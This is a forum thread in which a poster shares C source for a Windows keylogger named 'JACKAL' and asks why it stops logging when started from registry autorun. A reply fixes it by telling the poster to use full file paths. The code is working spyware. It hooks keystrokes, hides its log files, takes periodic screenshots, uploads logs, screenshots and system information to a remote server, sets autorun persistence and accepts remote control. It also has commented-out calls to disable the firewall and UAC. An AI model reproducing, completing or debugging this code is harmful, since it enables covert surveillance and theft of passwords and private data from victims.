-
Keylogger problem
I have the source code below,and it works perfect when i run it with double click.It captures keystrokes and makes screen shots for every 100 keystrokes + it can be controled remotely from another computer.
The problem is that when it is added to registry by calling SetAutorunEnable("JACKAL",true) function,it starts and captures keystrokes and everything,but it doesn't write to "work.n6" file and it doesn't increment pressed and photo_contor values.And i dont know why! Please help! I know that something is wrong in KeyboardEvent or JACKAL but i dont know what.Everything else works just fine!
#include "NZT.h"
LRESULT WINAPI KeyboardEvent (int nCode, WPARAM wParam, LPARAM lParam)
{
f = fopen("work.n6","a+");
wchar_t photo_name[MAX_PATH];
char * use;
LPWSTR convert;
if ((nCode == HC_ACTION) && ((wParam == WM_SYSKEYDOWN) || (wParam == WM_KEYDOWN)))
{
static int pressed = 0;
static int photo_contor = 0;
f = fopen("work.n6","a+");
KBDLLHOOKSTRUCT hooked_key = *((KBDLLHOOKSTRUCT*)lParam);
DWORD dwMsg = 1;
dwMsg += hooked_key.scanCode << 0x10;
dwMsg += hooked_key.flags << 0x18;
char lpszKeyName[0x400] = {0};
lpszKeyName[0] = '[';
int i = GetKeyNameText(dwMsg, (lpszKeyName + 1),0xFF) + 1;
int key = hooked_key.vkCode;
lpszKeyName[i] = ']';
//Gamma Border
if (key >= 'A' && key <= 'Z')
{
if (GetAsyncKeyState(VK_SHIFT)>= 0) key += 0x20;
if (f!=NULL)
fprintf(f,"%c", key);
pressed += 1;
}
else
{
if (f != NULL)
fprintf(f,"%s", lpszKeyName);
pressed += 1;
}
hide_file("work.n6");
hide_file("data.n6");
if (pressed > 100 /*&& connection_possible*/)
{
fclose(f);
uploadFile("work.n6","work.txt");
_itow(photo_contor,photo_name,0xA);
convert = wcscat(photo_name,L".jpeg");
ScreenShot(convert,50);
use = wide_to_utf8(convert);
uploadFile(use,use);
hide_file(use);
if (photo_contor > 0)
{
_itow(photo_contor - 1,photo_name,0xA);
convert = wcscat(photo_name,L".jpeg");
DeleteFile(wide_to_utf8(convert));
}
pressed = 0;
photo_contor ++;
}
fclose(f);
}
return CallNextHookEx(hKeyboardHook,nCode,wParam,lParam);
}
DWORD WINAPI JACKAL(LPVOID lpParm)
{
HINSTANCE hins;
hins = GetModuleHandle(NULL);
hKeyboardHook = SetWindowsHookEx ( WH_KEYBOARD_LL, (HOOKPROC) KeyboardEvent, hins, 0);
MSG message;
while (GetMessage(&message,NULL,0,0))
{
TranslateMessage( &message );
DispatchMessage( &message );
}
UnhookWindowsHookEx(hKeyboardHook);
return 0;
}
void wmain()
{
//stealth();
//disable_firewall_UAC();
auto_hide();
SetAutorunEnable("JACKAL",true);
WSAStartup(0x0101,&wsdata);
getComputerInfo();
writeComputerInfo();
uploadComputerInfo();
tasks[0] = CreateThread( NULL, 0,
(LPTHREAD_START_ROUTINE)createServer, NULL, 0, NULL);
tasks[1] = CreateThread( NULL, 0,
(LPTHREAD_START_ROUTINE)JACKAL,NULL, 0, NULL);
WaitForMultipleObjects(2, tasks, TRUE, INFINITE );
WSACleanup();
}
-
Re: Keylogger problem
You have to always use full path names rather than the local ones.
-
Re: Keylogger problem
Yes VictorN,i will take that into consideration.Thanks!
-
Re: Keylogger problem
Man you are a genius! It works thanks!
I've replaced "work.n6" with the full filename path!